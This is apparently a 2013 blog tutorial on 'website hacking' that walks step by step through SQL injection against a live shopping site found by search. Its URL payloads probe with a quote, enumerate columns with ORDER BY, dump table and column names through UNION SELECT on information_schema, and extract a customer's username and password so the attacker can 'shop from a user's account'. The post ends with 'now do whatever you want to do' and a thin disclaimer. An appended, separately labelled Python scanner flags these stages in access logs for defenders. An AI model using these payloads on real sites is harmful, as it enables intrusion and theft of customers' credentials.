Mar 21, 2013

Website hacking

To find a website with the URL ending with
where 4383 can be any number. In Google, I have some tricks you can use to look for sites ending with this tag.
Use the following commands in Google.
Once you find a website with this URL, open that website. For demonstration, I am taking a website
Step 2
Add ' after id=****
Now, if you get an error or a blank page after adding ', the site is accepting SQL commands from the browser's address bar, which means the site is vulnerable to SQL injection.
Step 3
The next step is to find out the number of vulnerable links.
Example: id=43434' order by 1 --
Check the number of vulnerable links by trying the values 1, 2, 3, 4, etc. for as long as the page does not give an error: order by 1 / order by 2 / etc. until it comes up blank.
Step 4
Find out the names of tables and columns:
union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 --
Step 5
What we have to do next is replace the link above with -17156' union all select table_name,*,*,*,* from information_schema.tables --
,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,table_name%20from%20information_schema.tables%20--
Step 6
Here group_concat will give the details of all the tables in the database of the website:
,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,group_concat%28table_name%29%20from%20information_schema.tables%20%20--
Step 7
But since we are hackers :p, we are always interested in one table, and that is the admin table, so look out for the admin table in the list of displayed table names. Here we chose the customer table because this is a shopping website and we want to shop from a user's account, so we will search for the columns in the customer table with the following command:
,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,group_concat%28column_name%29%20from%20information_schema.columns%20where%20table_name=%27customer%27%20--
Step 8
In the same way, extract the information of every column of that table via group_concat:
,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,group_concat%28column_name%29%20from%20information_schema.columns%20where%20table_name=char%2899,117,115,116,111,109,101,114%29%20--
Step 9
After executing the commands above, we get two column fields, that is
The limit function below will search for the username of the particular person with the id=1684
// Here %20 in the URL is not a command; it appears automatically once we execute our commands in the browser.
,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,strUsername%20from%20customer%20limit%201684,1%20--
Step 10
We finally got the username of the person, and now we will look for the password of that person by typing the same command and replacing strPassword with strUsername.
,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,strPassword%20from%20customer%20limit%201684,1%20--
Finally, you have the username and the password of the person of your wish; now do whatever you want to do :)
NOTE: All these hacking steps are meant only to teach how SQL injection can be done; no illegal work should be done with the above skills.
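Each stage of the steps above leaves a recognisable request in the target's web server access log, which is where a defender can spot this activity. The following is an added example, not part of the original post: it scans Combined Log Format lines for those stages. The rule names, the /product.php path and the client addresses are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# One indicator per stage of the walkthrough; the names are this example's own.
RULES = [
    ("quote-probe", re.compile(r"^-?\d+\s*'")),
    ("order-by-enum", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema-read", re.compile(r"\binformation_schema\.(tables|columns)\b", re.I)),
    ("group-concat", re.compile(r"\bgroup_concat\s*\(", re.I)),
    ("char-encoding", re.compile(r"\bchar\s*\(\s*\d+(\s*,\s*\d+)+\s*\)", re.I)),
]
# Client address and request target from a Combined Log Format line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(value):
    """Return the names of all rules matching one decoded parameter value."""
    return [name for name, rx in RULES if rx.search(value)]

def scan(lines):
    """Return (client, parameter, rule names) for each suspicious parameter."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qsl percent-decodes, so %20, %27 and %28 forms are normalised.
        for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            hits = classify(value)
            if hits:
                findings.append((client, key, hits))
    return findings

# Constructed sample log: /product.php and the addresses are hypothetical.
SAMPLE_LOG = [
    '198.51.100.20 - - [21/Mar/2013:10:00:00 +0000] "GET /product.php?id=4383 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [21/Mar/2013:10:00:05 +0000] "GET /product.php?id=4383%27 HTTP/1.1" 500 312',
    '203.0.113.7 - - [21/Mar/2013:10:00:09 +0000] "GET /product.php?id=4383%27%20order%20by%203%20-- HTTP/1.1" 200 0',
    '203.0.113.7 - - [21/Mar/2013:10:00:30 +0000] "GET /product.php?id=-1%20union%20all%20select%201,'
    'group_concat%28table_name%29%20from%20information_schema.tables%20-- HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for client, key, hits in scan(SAMPLE_LOG):
        print(client, key, ",".join(hits))
```

These rules are heuristics for triage: a free-text search field can legitimately contain words such as "order by", so hits on a numeric parameter like id carry the most weight.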